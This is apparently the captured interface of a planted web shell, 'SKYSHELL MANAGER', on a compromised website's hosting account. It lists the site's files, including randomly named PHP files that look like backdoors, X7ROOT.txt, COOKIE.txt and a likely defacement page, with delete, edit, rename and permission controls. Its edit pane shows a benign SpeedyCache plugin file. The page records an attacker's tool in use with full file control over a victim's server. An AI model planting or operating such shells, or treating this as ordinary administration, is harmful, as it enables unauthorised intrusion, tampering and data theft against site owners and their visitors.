📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: commoncss.php
<?php /* * SPEEDYCACHE * https://speedycache.com/ * (c) SpeedyCache Team */ namespace SpeedyCache; if(!defined('ABSPATH')){ die('Hacking Attempt!'); } class CommonCss{ static function get_endpoint($is_unusedcss = false){ global $speedycache; $endpoints = get_transient('speedycache_ccss_endpoint'); $target_file = empty($is_unusedcss) ? 'index.php' : 'ucss.php'; $mirror = 'https://s4.softaculous.com/a/speedycache/critical-css/' . $target_file; $license = strpos($speedycache->license['license'], 'SPDFY') !== 0 ? '' : $speedycache->license['license']; if(empty($endpoints)){ $res = wp_remote_get(SPEEDYCACHE_API.'license.php?license='.$license.'&url='.rawurlencode(site_url())); // Did we get a response ? if(!is_array($res)){ return $mirror; } if(empty($res['body'])){ return $mirror; } $body = json_decode($res['body'], true); if(empty($body['fast_mirrors'])){ return $mirror; } $endpoints = $body['fast_mirrors']; if(empty($endpoints) || !is_array($endpoints)){ return $mirror; } } $index = floor(rand(0, count($endpoints) - 1)); if(empty($endpoints[$index])){ return $mirror; } set_transient('speedycache_ccss_endpoint', $endpoints, 180); $mirror = str_replace('a/softaculous', 'a/speedycache/critical-css/'.$target_file, $endpoints[$index]); return $mirror; } static function schedule($schedule_name, $urls){ $scheduled = self::get_schedule(array($schedule_name)); $time = time(); if(!empty($scheduled) && isset(end($scheduled)['time'])){ // getting the last index to get the last scheduled event $time = end($scheduled)['time'] + 10; } if(count($scheduled) > 10){ return; } $final_schd_time = $time; if(!wp_next_scheduled($schedule_name, array('urls' => $urls))){ wp_schedule_single_event($final_schd_time, $schedule_name, array('urls' => $urls)); } } // Returns an array of cron event "speedycache_unused_css" static function get_schedule($event_name){ $cron = _get_cron_array(); if(empty($cron)){ return false; } $scheduled = array(); foreach($cron as $key => $crn){ foreach($crn as $e_key => $event){ if(!in_array($e_key, $event_name)){ continue; } $args = []; foreach($event as $evt){ if(!empty($evt['args'][0])){ $args = $evt['args'][0]; } } array_push($scheduled, array('name' => get_the_title($args), 'time' => $key)); } } return $scheduled; } // Adds the Critical CSS to the cache file static function update_cached($file, $css){ global $speedycache; if(!file_exists($file)){ return; } $content = file_get_contents($file); if(empty($content)){ return; } $content = static::update_content($content, $css); // Updates the .html.gz file if(!empty($speedycache->options['gzip'])){ self::update_gzip($file, $content); } // Updates the .html file file_put_contents($file, $content); } static function update_gzip($file, $content){ $gz_file = str_replace('.html', '.html.gz', $file); if(file_exists($gz_file)){ unlink($gz_file); } $content = gzencode($content, 6); if(!empty($content)){ file_put_contents($gz_file, $content); } } static function log($log_name, $message, $url = '-'){ $ccss_logs = get_option($log_name, []); if(count($ccss_logs) > 10){ array_shift($ccss_logs); } $ccss_logs[$url] = array('time' => date('h:i:s'), 'message' => $message); update_option($log_name, $ccss_logs); } }
Save